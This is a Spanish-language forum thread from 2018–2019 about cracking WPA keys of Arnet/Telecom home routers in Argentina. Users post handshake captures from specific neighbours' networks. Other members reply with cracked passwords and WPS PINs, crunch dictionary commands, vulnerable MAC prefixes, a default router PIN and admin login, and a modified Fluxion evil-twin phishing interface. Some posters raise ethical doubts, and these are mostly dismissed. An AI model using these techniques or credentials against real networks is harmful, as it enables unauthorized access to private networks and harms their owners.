Procurá acercarte lo más que puedas a la red para lograr un resultado esperado.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diego10 en 11 de Marzo de 2018, 01:13:33 PM
@lalolanda

podes subir todos tus .cap completamente gratis a:

https://wpa-sec.stanev.org

1. generate una clave ID (key)
2. subis todos los .caps que tengas ya que no hay ningun tipo de limite!
3. con tu key vas revisando los resultados obtenidos

a mi me funciono!

(https://i.imgur.com/sWohUxp.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Carlos1996hola en 12 de Marzo de 2018, 03:06:23 AM
You are not allowed to view links. Register or Login
Error de tipeo de Kory, en realidad es un "5" no una "S". Las claves de estos ZyXEL son siempre hexadecimales de 10 dígitos.
(http://oi67.tinypic.com/211s6qp.jpg)

Salu2!
hola me podrian ayudar a crear un diccionario con crunch para ese tipo de redes arnet
seria algo asi?
crunch 10 10 0123456789ABCDEF hex -o START -t A@BC@@D@@@
o me equivoco en algo?
una pregunta mas, como puedo reconocer cuando la red arnet lleva este tipo de patron como deberia ser su bssid?
gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 12 de Marzo de 2018, 05:43:32 PM
You are not allowed to view links. Register or Login
hola me podrian ayudar a crear un diccionario con crunch para ese tipo de redes arnet
seria algo asi?
crunch 10 10 0123456789ABCDEF hex -o START -t A@BC@@D@@@
o me equivoco en algo?
una pregunta mas, como puedo reconocer cuando la red arnet lleva este tipo de patron como deberia ser su bssid?
gracias!

Hola.
Si, esta bien, solo scaria la palabra hex, porque representa la lista de caracteres hexadecimales que depende como este seteado tu charset.lst puede incluir las letras minusculas. con solo mayusculas te deberia quedar un diccionario de 176 megas o por ahí.

Con respescto al patron,  es para los Zyxel y como su clave es hexadecimal, el nombre de la red tiene que tambien tener caracteres hexadecimales de 0 a 9, A a F,  si tiene cualquier letra de la g a la z en el SSID olvidate.
Ademas por datos de está página y propios me ha funcionado con estas macs

EC:43:F6:XX:XX:XX
FC:5F:28:XX:XX:XX
04:BF:6D:XX:XX:XX
B8:EC:A3:XX:XX:XX
4C:9E:FF:XX:XX:XX

si lográs dar sacar alguna con este patron, me gustaria que sigamos actualizando la lista mac address que son compatibles.
saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 08 de Abril de 2018, 09:31:56 PM
You are not allowed to view links. Register or Login



Estoy en la misma que vos, encontraste la password?
Gracias
Confirmadísimo en dos routers iguales usuario: admin contraseña: CalVxePV1!.
Espero puedaa ingresar.
PD: usé Chrome.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Ruskov en 10 de Abril de 2018, 02:54:46 PM
Buenas, como estan?

Consegui esto del wifi pero no puedo conseguir la password

WiFi-Arnet-9558 (60:31:97:AA:C1:BA)

http://www.mediafire.com/file/01w6ht9cnxh7n7g/WiFiArnet9558_60-31-97-AA-C1-BA.cap

Título: Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 23 de Abril de 2018, 09:14:02 AM
Zyxel vmg1925-t20k

Dos consultitas muchachos:

1.- :(  Che con respecto a las redes Arnet de los nuevos routers (zyxel vmg1925-t20k). ¿Cómo hacen ustedes para ver cual es el PIN por defecto que tiene ese AP ya que en la configuración wps no lo tiene. Esto es, como sabrán para eventualmente volver a conseguir la clave wifi cuando la cambien.

2.- Realmente se puede hacer eso de pedir ya asi de frente mal una contraseña wifi de un vecino?. No me quiero hacer el moralista ni mucho menos pero la esencia de esto (mi humilde opinión) es APRENDER recibir/transmitir conocimiento. No sé que opinan uds?.



cita: "...si das pescado a un hombre hambriento lo nutres deurante una jornada, en cambio si le enseñas a pescar lo nutriras toda su vida...". LAO TSE

Buen Lunes a todos crackers, lammers, geeks, entusiastas! 8)

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 25 de Abril de 2018, 05:08:03 AM
El PIN lo podés ver activándolo una vez ingresado al router.

Lo de pedir la contraseña se puede, depende del vecino si quiere dártela o no. Hay algunos que no les importa, ya que tienen el servicio sólo para decir que tienen Internet.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 25 de Abril de 2018, 06:28:16 AM
You are not allowed to view links. Register or Login
Buenas, como estan?

Consegui esto del wifi pero no puedo conseguir la password

WiFi-Arnet-9558 (60:31:97:AA:C1:BA)

http://www.mediafire.com/file/01w6ht9cnxh7n7g/WiFiArnet9558_60-31-97-AA-C1-BA.cap


La contraseña que necesitás es: 9D55DF8DB4.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: mgulius en 29 de Abril de 2018, 11:14:40 PM
Buenas a todos, He probado un diccionario con el crunch de esta manera para arnet:

crunch 10 10 0123456789ABCDEF -o START -t A@BC@@D@@@ sin exito. Alguna idea de qué otro diccionario podría probar o la key?

y para telecentro probé:

Esta probé con: tele-%%%%%%%

http://www.mediafire.com/file/3ma3eeab88q3h7u/Telecentro3D03-01.cap

Ningun de los dos tuve exito. alguna idea o ayuda?

http://www.mediafire.com/file/7att8mb6bi9eefe/Wifi-arnet-672-01.cap.zip
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Wired-PRO en 29 de Abril de 2018, 11:58:50 PM
You are not allowed to view links. Register or Login
Buenas a todos, He probado un diccionario con el crunch de esta manera para arnet:

crunch 10 10 0123456789ABCDEF -o START -t A@BC@@D@@@ sin exito. Alguna idea de qué otro diccionario podría probar o la key?

y para telecentro probé:

Esta probé con: tele-%%%%%%%

http://www.mediafire.com/file/3ma3eeab88q3h7u/Telecentro3D03-01.cap

Ningun de los dos tuve exito. alguna idea o ayuda?

http://www.mediafire.com/file/7att8mb6bi9eefe/Wifi-arnet-672-01.cap.zip

estas muy complicado con las password

tanto la de telecentro como la de arnet son password complicadas imposibles, te queda la opcion de usar LINSET.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: rodo182 en 30 de Abril de 2018, 07:11:52 PM
Buenas 
vuelvo a subir un Cap que no estaba disponible   por si alguien lo necesita por X motivos

WiFi-Arnet-e7b5 (EC-43-F6-B3-24-FF)
https://mega.nz/#!JlZgRbKT!kbiunY7mDoGFN-eO60EnwDnKlkCdXPS1noh70dku5ws

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 30 de Abril de 2018, 08:39:23 PM
You are not allowed to view links. Register or Login
Buenas 
vuelvo a subir un Cap que no estaba disponible   por si alguien lo necesita por X motivos

WiFi-Arnet-e7b5 (EC-43-F6-B3-24-FF)
https://mega.nz/#!JlZgRbKT!kbiunY7mDoGFN-eO60EnwDnKlkCdXPS1noh70dku5ws

Saludos

Por fin lo subiste nuevamente.

La contraseña es "E07BF05F5C"; también por si alguien la necesita por X motivos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 02 de Mayo de 2018, 09:33:07 AM
You are not allowed to view links. Register or Login
El PIN lo podés ver activándolo una vez ingresado al router.

Lo de pedir la contraseña se puede, depende del vecino si quiere dártela o no. Hay algunos que no les importa, ya que tienen el servicio sólo para decir que tienen Internet.

He ahi la cuestion que estoy frente a la pantalla de configuracion del modem apartado WPS pero no entiendo nada. Mas tarde adjunto captura de pantalla.

Con respecto a lo de pedir contraseñas, me expresé mal. Lo que pasa es que me llamó la atención después de tantos años de este hilo que esten apareciendo usuarios que entran solo para dejar caps pidiendo abiertamente que otro usuario le "saque" la contraseña asi sin más.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 02 de Mayo de 2018, 09:59:53 AM
You are not allowed to view links. Register or Login
He ahi la cuestion que estoy frente a la pantalla de configuracion del modem apartado WPS pero no entiendo nada. Mas tarde adjunto captura de pantalla.

Con respecto a lo de pedir contraseñas, me expresé mal. Lo que pasa es que me llamó la atención después de tantos años de este hilo que esten apareciendo usuarios que entran solo para dejar caps pidiendo abiertamente que otro usuario le "saque" la contraseña asi sin más.

Para utilizar el PIN WPS necesitás dicho número de ocho dígitos.

Por lo otro: en el mundo hay gente que le gusta ayudar, y gente que no...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 02 de Mayo de 2018, 10:19:51 AM
You are not allowed to view links. Register or Login
Hola queria saber is me podian ayudar con este, no tengo buen poder de calculo

https://www.dropbox.com/s/wgosyg0h3wdvny2/hs-E4-BE-ED-C8-DA-1B.cap?dl=0

Gracias!


Podés conseguir conectarte a la red que querés utilizando el JumpStart, u otro método a través del PIN WPS.
El PIN WPS de la red es: 31630351
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: TaraService en 04 de Mayo de 2018, 07:02:02 PM
Hola,

Necesito ayudar a una amiga quebrando la clave de esta red wifi de arnet de nombre "WiFi-Arnet-mp58"

el mac address es 50-01-D9-65-0B-58

El handshake capturado esta en este archivo https://drive.google.com/file/d/1_2zUGiM9geqPz5snuiXGEUXtvz3lQV-y/view?usp=sharing (https://drive.google.com/file/d/1_2zUGiM9geqPz5snuiXGEUXtvz3lQV-y/view?usp=sharing)

Gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 17 de Mayo de 2018, 11:35:42 PM
Buenas! Ando necesitando ayuda con esta red:

WiFi-Arnet-4273
D4:D1:84:A5:20:7E
https://drive.google.com/open?id=1dvz3G6Z3fdyvsPieWh6nvI8kyxg1k9sE

Graciassss
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 18 de Mayo de 2018, 12:25:10 AM
You are not allowed to view links. Register or Login
Buenas! Ando necesitando ayuda con esta red:

WiFi-Arnet-4273
D4:D1:84:A5:20:7E
https://drive.google.com/open?id=1dvz3G6Z3fdyvsPieWh6nvI8kyxg1k9sE

Graciassss

Si no cambiaron la contraseña, debería ser ésta: v974x6xx9z.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Mvb2601 en 19 de Mayo de 2018, 04:45:59 PM
Buenas!  Hoy pude descifrar una de fibertel pero es la mas inestable, esta lejos y va y viene y las otras no puedp obtener el handshake xq no tienen trafico. Entonces les agradeceria que me ayuden con esta red:

WiFi-Arnet-d6zw
9C:B2:B2:7B:3F:BC

https://drive.google.com/file/d/1P-c3RJcoo7s4jz_DLyMwtZRdSgtEzict/view?usp=drivesdk

Millón de gracias!!! Estoy en lo de la abuela y necesito Internet los findes que vengo que los datos andan fatal. jaja.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: carlosornella en 20 de Mayo de 2018, 11:37:12 AM
You are not allowed to view links. Register or Login
El PIN lo podés ver activándolo una vez ingresado al router.

Lo de pedir la contraseña se puede, depende del vecino si quiere dártela o no. Hay algunos que no les importa, ya que tienen el servicio sólo para decir que tienen Internet.

?? que? como una cuestión de status?
es broma no?

Lo bien que hago poniendo mayúsculas, minúsculas, números y símbolos cuando le dejo los modems a los clientes...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 20 de Mayo de 2018, 11:52:32 AM
You are not allowed to view links. Register or Login
?? que? como una cuestión de status?
es broma no?

Lo bien que hago poniendo mayúsculas, minúsculas, números y símbolos cuando le dejo los modems a los clientes...

Sí, tal cual.
No es malo pedir; lo malo es cambiar la contraseña luego de darla. Gracias al PIN WPS, no hay problema con eso.

Como te dije, hay gente que no le importa compartir el Internet, ya que no lo usan para nada.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 20 de Mayo de 2018, 05:07:33 PM
Hola!
Ando necesitando ayuda con esta red -casi seguro- Arnet:

WiFi - Ali
90:F6:52:91:D3:D4
https://drive.google.com/open?id=1sj9tsqrq7Cb0JdOT8GF5RhEJbypsqrj_

Gracias y saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 20 de Mayo de 2018, 05:15:10 PM
You are not allowed to view links. Register or Login
Hola!
Ando necesitando ayuda con esta red -casi seguro- Arnet:

WiFi - Ali
90:F6:52:91:D3:D4
https://drive.google.com/open?id=1sj9tsqrq7Cb0JdOT8GF5RhEJbypsqrj_

Gracias y saludos!

Ya hiciste el pedido en otro Tema; pasá los datos del modem-router de origen de la señal, por favor. Así podremos saber si es de Arnet, o no.

Gracias.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 20 de Mayo de 2018, 05:31:32 PM
You are not allowed to view links. Register or Login
Ya hiciste el pedido en otro Tema; pasá los datos del modem-router de origen de la señal, por favor. Así podremos saber si es de Arnet, o no.

Gracias.

Buenas!
¿Cómo averiguo esos datos? Primero pensé que podía ser Fibertel pero luego vi la factura del propietario de la red en el edificio y es de Arnet-Telecom-Personal (claro que puede ser de Telecom y utilizar otro proveedor de internet).
Gracias!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 20 de Mayo de 2018, 05:36:31 PM
You are not allowed to view links. Register or Login
Buenas!
¿Cómo averiguo esos datos? Primero pensé que podía ser Fibertel pero luego vi la factura del propietario de la red en el edificio y es de Arnet-Telecom-Personal (claro que puede ser de Telecom y utilizar otro proveedor de internet).
Gracias!!

Intentá hacer una captura de la otra red que tiene el mismo nombre. Si no lo lográs, no importa, tomá nota de la dirección mac de la otra red (puede comenzar con 60:31:97:XX:XX:XX), y transcribíla por acá.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 20 de Mayo de 2018, 05:41:51 PM
You are not allowed to view links. Register or Login
Intentá hacer una captura de la otra red que tiene el mismo nombre. Si no lo lográs, no importa, tomá nota de la dirección mac de la otra red (puede comenzar con 60:31:97:XX:XX:XX), y transcribíla por acá.

No veo otra red con el mismo nombre.. de ninguna de las redes Arnet que tengo cerca!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 20 de Mayo de 2018, 05:48:36 PM
You are not allowed to view links. Register or Login
No veo otra red con el mismo nombre.. de ninguna de las redes Arnet que tengo cerca!

Bueno, no importa. De todos modos no te serviría guiarte de un patrón, porque seguro que cambiaron la contraseña por defecto.
Sólo te queda hacer capturas de cada una las redes que estén a tu alcance.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Wired-PRO en 20 de Mayo de 2018, 06:30:24 PM
90:F6:52   TP-LINK TECHNOLOGIES CO.,LTD.

pdom12, parece que la dueña/o puso su propio router!!!!.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 24 de Mayo de 2018, 01:53:44 PM
You are not allowed to view links. Register or Login
90:F6:52   TP-LINK TECHNOLOGIES CO.,LTD.

pdom12, parece que la dueña/o puso su propio router!!!!.

No todas las redes son un regalo.. jajaja
Hay gente precavida!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: n0b0dy en 29 de Mayo de 2018, 04:58:42 PM
por si le sirve a alguien.. hay una aplicacion en playstore llamada "WPS Connect" y funciona para la mayoria de los arnet que tienen activado el WPS (no todos). Si el celular esta rooteado te muestra la clave, sino solo conecta, pero se puede acceder entrando al router, la direccion suele ser 192.168.0.1 o 192.168.1.1 y ahi pueden ver la clave.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Huev0 en 30 de Mayo de 2018, 12:15:57 AM
You are not allowed to view links. Register or Login
por si le sirve a alguien.. hay una aplicacion en playstore llamada "WPS Connect" y funciona para la mayoria de los arnet que tienen activado el WPS (no todos). Si el celular esta rooteado te muestra la clave, sino solo conecta, pero se puede acceder entrando al router, la direccion suele ser 192.168.0.1 o 192.168.1.1 y ahi pueden ver la clave.
Buen aporte! A probar!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: yocarim en 05 de Junio de 2018, 02:46:16 AM
Buenas a todos! Ya terminado mi aprendizaje en redes fibertel, necesito saber sobre redes arnet.

He leido casi todo el hilo completo, pero veo que muchos post son viejos. Asi que tengo algunas dudas.


Muchas gracias a todos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Hector10XDdd432100 en 06 de Julio de 2018, 10:19:12 PM
[Hola disculpen las molestias...me ayudarían con la contraseña de este módem?

Bssid=74:88:8B:02:51:8E
Essid:WiFi-Arnet-4977
Modelo: ADB Broadband italia
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 06 de Julio de 2018, 10:28:41 PM
You are not allowed to view links. Register or Login
[Hola disculpen las molestias...me ayudarían con la contraseña de este módem?

Bssid=74:88:8B:02:51:8E
Essid:WiFi-Arnet-4977
Modelo: ADB Broadband italia

Intentá con: tblm701i0b .
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Hector10XDdd432100 en 06 de Julio de 2018, 11:51:08 PM
Hola no me sirvió la contraseña....como hago para pasar el handshake??
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 07 de Julio de 2018, 12:26:14 AM
You are not allowed to view links. Register or Login
Hola no me sirvió la contraseña....como hago para pasar el handshake??

Utilizá un servidor (de preferencia "Mega" o "Google") para subir el archivo de tu handshake, así podemos ayudarte.
Mientras, intentá con alguna de éstas:

rcnumwlpun
4zkurc7dzc
if1shkamyc
poe0ndlwnd
l34dowjzif
hq2ntre1g3
ewlz4somr5
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 08 de Julio de 2018, 11:59:27 AM
You are not allowed to view links. Register or Login
Me sigue diciendo contraseña incorrecta....nose que hacer

Acercate lo más que puedas al origen de la señal. Comprobá utilizando un celular que tenga buena sensibilidad a las redes Wi-Fi.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 09 de Julio de 2018, 12:25:21 AM
You are not allowed to view links. Register or Login
Sisi me acerqué hasta que la señal pone exelente y me dice contraseña incorrecta probaste descifrar los dos handshake??quizás tienen diferente contraseña
No intenté con los dos archivos porque supuse que tienen el mismo handshake.
Tal vez hiciste las capturas sin "Olvidar" la red en tu celular, o "Eliminar" la red de tu computadora.
"Olvidá" o "Eliminá" la red en cada dispositivo que tengas; intentá obtener mejor cobertura; utilizá otra herramienta (por ejemplo "Wifite") para obtener el handshake, y seguiremos intentando darte la solución.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 09 de Julio de 2018, 12:29:29 AM
You are not allowed to view links. Register or Login
Acá hay más handshake:
1)https://mega.nz/#!Y7wkHaxY!Gj5LtoUHxEjobuQgMMi-O_EyaAyRncT-Ehx5WZY-9hU

2)https://mega.nz/#!gioi1Aha!t9sRHWiJsKvpKJaPweYDJeCMsgREOKudYVkq8xuNvhE

3)https://mega.nz/#!Ni5i1YzR!xl_Ms7wDkL1wINiD4apA3jX_YU-kEHHRCIdYym1Mz18

4)https://mega.nz/#!Aupg3SKS!z7-UAo3pclw3KhUAPqNpUVBJ0cPWQn3KegzLazyGH3Q

Me podrían ayudar con esto porfa

No subás dos capturas distintas, porque son iguales a pesar de estar capturas en distintos momentos. Tienen la misma integridad porque utilizaste la misma herramienta para generarlas; la misma distancia; etcétera.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 09 de Julio de 2018, 09:45:01 PM
You are not allowed to view links. Register or Login
Esas capturas son dos con una herramienta y dos con otra, las dos últimas son de otro wifi cerca de casa...cuando hago los handshake los anteriores los eliminó y capturó otros con diferentes herramientas

tus capturas no son buenas, te recomendaria utilizar el ultimo wifislax64 v1.1, te dejo el link para que te lo bajes.

http://www.mediafire.com/file/5yndrs88pie88nz/wifislax64-1.1-final.iso

utiliza handshaker para capturar y verifica que tus capturas no pesen solo bytes sino que tienen que pesar kilobytes o megabytes!!!.

recaptura 1 sola vez y volve a subir los caps.
Título: ayuda
Publicado por: kyo en 12 de Julio de 2018, 08:38:13 PM
hola buenos dias/tardes/noches
e intentado auditar una red arnet y no e podido (soy principiante) auditarla
https://mega.nz/#F!LZYiQYbR!XtI4-NBjuk1SMV_waQMOjA el cap que dice 1 no es
Título: Re:ayuda
Publicado por: h4x0r en 12 de Julio de 2018, 11:51:46 PM
You are not allowed to view links. Register or Login
hola buenos dias/tardes/noches
e intentado auditar una red arnet y no e podido (soy principiante) auditarla
https://mega.nz/#F!LZYiQYbR!XtI4-NBjuk1SMV_waQMOjA el cap que dice 1 no es

en el CAP que se llama 1 encontre esto por si te sirve

Fibertel WiFi680 2.4GHz: 0145946168

;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: kyo en 17 de Julio de 2018, 08:42:45 AM
perdón, era el cap que decía 58l0 pero si me sirvio, muchas gracias y me gustaría saber si me recomendase algunos vídeo o programas (sistemas op) para aprender, por que yo e intentado y no e podía dar con nada
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fitap en 21 de Agosto de 2018, 01:13:51 AM
Buenas, como se auditan las WiFi-Arnet-xxxd ?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Huev0 en 21 de Agosto de 2018, 07:30:18 AM
You are not allowed to view links. Register or Login
Buenas, como se auditan las WiFi-Arnet-xxxd ?
Fijate si tiene el wps activado
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fitap en 21 de Agosto de 2018, 10:34:43 AM
yup !
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: micaels en 16 de Octubre de 2018, 07:42:07 PM
Hola, cómo andan? Me ayudan con este cap?

Sé que es de Arnet porque es lo único que llega a esta zona
https://mega.nz/#!xBZHSKoI!RCYPw9EzrTDIasxofb9l267fjVKae16qAAAAAAAAAAA

Desde ya muchas gracias, saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 16 de Octubre de 2018, 08:52:56 PM
You are not allowed to view links. Register or Login
Hola, cómo andan? Me ayudan con este cap?

Sé que es de Arnet porque es lo único que llega a esta zona
https://mega.nz/#!xBZHSKoI!RCYPw9EzrTDIasxofb9l267fjVKae16qAAAAAAAAAAA

Desde ya muchas gracias, saludos!

tu handshake esta bien corrupto, nunca puede pesar 0 bytes!!!, no hay nada adentro, recaptura bien seteando la BSSID del router y el numero de canal wifi.

(https://i.imgur.com/p3Ndtzb.jpg)

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: micaels en 16 de Octubre de 2018, 09:13:22 PM
Disculpa, se corrompió mientras lo subía a MEGA, acá está el nuevo link

https://mega.nz/#!wFYy1SjR!hjz_1C_KteW_fF-D0j3aBPrfWzcBFaFT7gNFBM71PEI

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Rabufetti en 24 de Octubre de 2018, 07:03:21 PM
Hola! comparto esta info para quien le sirva.
Al parecer los routers VMG1312-B10E traen por defecto el pin 40684963, pude acceder a 3 redes con ese pin. Recomiendo usar reaver desde wifislax.

PD: Gracias al maestro @Kory que me estuvo asesorando con todo esto
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 10 de Noviembre de 2018, 09:22:40 PM
Bueno chicos aqui va mi pequeño granito de arena a la comunidad wirelenezca o como sea. Me debo a este "forazo" asi que armé una interface para Fluxion imitando la de Telecom (Arnet).
Es decir para que el Twin Evil Attack funcione haciendo mas amigable la interfaz.
Espero la disfruten sin joder a nadie. ;)

Instalación:
1.-   Descargar el archivo https://1drv.ms/u/s!Avq3qBBurScBsE2GqU25HMzVFrq4
2.-   Descomprimir la carpeta fluxion modificada. (tar -xvzf fluxion.tar.gz)
2.-   Reemplazar la carpeta "fluxion" de su distro preferida con la que descargaron/descomprimieron.

PD: Los quiero lejos de mi casa con esta m... >:(
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: nico0cul en 05 de Diciembre de 2018, 09:47:56 AM
You are not allowed to view links. Register or Login
Buen Martes 13.
La contraseña que necesitas es: E07BF05FSC. La saqué en dos horas y cuarenta y tres minutos en una netbook del gobierno a 699.90 claves por segundo.

Como sacaste la contraseña? con diccionario o como?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Huev0 en 05 de Diciembre de 2018, 03:00:20 PM
You are not allowed to view links. Register or Login
Como sacaste la contraseña? con diccionario o como?
La clave está en hexadecimal, osea que cada digito puede ser "0123466789ABCDEF"

La red es WiFi-Arnet-e7b5
Y la clave es E07BF05FSC

De los diez digitos que contiene la clave, reemplazas los de color rojo, en ese orden, como puse recién.
Te queda por descifrar 6 caracteres, (16 a la sexta = 16​777​216 claves posibles)...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GustavocAr en 05 de Diciembre de 2018, 03:46:32 PM
You are not allowed to view links. Register or Login
La clave está en hexadecimal, osea que cada digito puede ser "0123466789ABCDEF"

La red es WiFi-Arnet-e7b5
Y la clave es E07BF05FSC

De los diez digitos que contiene la clave, reemplazas los de color rojo, en ese orden, como puse recién.
Te queda por descifrar 6 caracteres, (16 a la sexta = 16​777​216 claves posibles)...

Muy interesante!! lo que si me queda una duda huevo, si decis que la clave es hexadecimal y contiene solo "0123466789ABCDEF" porque la pass que salio tiene una letra "S"???
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 05 de Diciembre de 2018, 08:58:26 PM
You are not allowed to view links. Register or Login
Muy interesante!! lo que si me queda una duda huevo, si decis que la clave es hexadecimal y contiene solo "0123466789ABCDEF" porque la pass que salio tiene una letra "S"???

La letra "ese" está agregada a propósito para hacer pensar, que se den cuenta, y puedan entender mejor sin necesidad de preguntar, cuando pueden leer todas las páginas de cada tema antes de preguntar, cuando las respuestas están ya dadas.
Como seguro vieron, un usuario preguntó por qué una versión actualizada es mejor a una vieja; o si puede instalar una versión de 64, en un "32"...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GustavocAr en 06 de Diciembre de 2018, 02:55:51 AM
You are not allowed to view links. Register or Login
La letra "ese" está agregada a propósito para hacer pensar, que se den cuenta, y puedan entender mejor sin necesidad de preguntar, cuando pueden leer todas las páginas de cada tema antes de preguntar, cuando las respuestas están ya dadas.
Como seguro vieron, un usuario preguntó por qué una versión actualizada es mejor a una vieja; o si puede instalar una versión de 64, en un "32"...

Creo que tu respuestas no dice nada! no se que tiene que ver si es de 64 o 32!!! nada que ver mi pregunta con tu respuesta, la cual parece solo palabras sin ningún sentido, ya que no dice nada...  Saludos, y espero que alguien me pueda dar una respuesta con algo de contenido !!!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Huev0 en 06 de Diciembre de 2018, 01:44:56 PM
Justo se tomo ese caso, que la letra "s" era falsa.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 30 de Diciembre de 2018, 08:50:05 PM
Buenas! Se están pudiendo descifrar claves del formato WiFi-Arnet-#### con # siendo una letra o número cualquiera (no hexa)??

Muchas gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 30 de Diciembre de 2018, 09:51:07 PM
Buenas! Tengo un .cap de Arnet que no pude descifrar:
Red: WiFi-Arnet-6773
00:8C:54:AF:7C:52
Cap: https://drive.google.com/open?id=1rKkBlFBR6JNqu14Uaq8l3jTBG6bo7g9O

Si lo logran muchísimas gracias!!!  ;D
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 31 de Diciembre de 2018, 06:35:52 PM
You are not allowed to view links. Register or Login
Buenas! Tengo un .cap de Arnet que no pude descifrar:
Red: WiFi-Arnet-6773
00:8C:54:AF:7C:52
Cap: https://drive.google.com/open?id=1rKkBlFBR6JNqu14Uaq8l3jTBG6bo7g9O

Si lo logran muchísimas gracias!!!  ;D

La clave que solicitás es: ckpiyxb6at.
Creo que no la pudiste descifrar porque no lo intentaste (hay muchos generadores de contraseñas de Arnet). A pesar de todo, posteaste como corresponde.
¡Feliz Año nuevo a todos!

P.D.: No te olvidés de activar el WPS -por si te cambian la contraseña-.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: brianblc99 en 31 de Diciembre de 2018, 11:11:56 PM
Me ayudan con este, es Arnet

http://www.mediafire.com/file/00bvj88pe846b57/luffy-01.cap/file

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: h4x0r en 01 de Enero de 2019, 01:56:34 AM
You are not allowed to view links. Register or Login
Me ayudan con este, es Arnet

http://www.mediafire.com/file/00bvj88pe846b57/luffy-01.cap/file

POR FAVOR RESPETA A LOS QUE COLABORAN!!!, YA SUBISTES ESTE HANDSHAKE EL 5 DE SEPTIEMBRE

(https://i.imgur.com/NGs64rI.jpg)

NO INSISTAS!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: pdom12 en 01 de Enero de 2019, 12:52:57 PM
You are not allowed to view links. Register or Login
La clave que solicitás es: ckpiyxb6at.
Creo que no la pudiste descifrar porque no lo intentaste (hay muchos generadores de contraseñas de Arnet). A pesar de todo, posteaste como corresponde.
¡Feliz Año nuevo a todos!

P.D.: No te olvidés de activar el WPS -por si te cambian la contraseña-.

Fenómeno! Gracias! Igualmente no me conecta o me tira que no tiene conexión a internet, por qué puede ser?
Qué generador usás vos? Porque sí intenté pero no pude descifrar (tengo menos experiencia en redes Arnet...)

Muchas gracias y feliz año!!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Gordo en 01 de Enero de 2019, 03:59:29 PM
You are not allowed to view links. Register or Login
Fenómeno! Gracias! Igualmente no me conecta o me tira que no tiene conexión a internet, por qué puede ser?
Qué generador usás vos? Porque sí intenté pero no pude descifrar (tengo menos experiencia en redes Arnet...)

Muchas gracias y feliz año!!!
Puede ser que el dueño de la red no haya pagado el abono, o haya problemas en las conexiones hacia el modem-router. También puede ser que esté deshabilitado el servidor DCHP. Pero no podrás sacarte la duda si no entrás a la configuración del modem-router y diagnosticás el servicio.

El generador de contraseñas de Arnet que uso, es una versión para Windows que descargué hace mucho tiempo de alguna página web. Actualmente ví que existen muchas aplicaciones para el sistema operativo Android que también te generan las mismas contraseñas "por defecto" de los modems-routers de Arnet (funciona solo con algunos patrones de direcciones MAC).

¡Felicidades en este Año Nuevo! ¡Y a hacer más capturas!
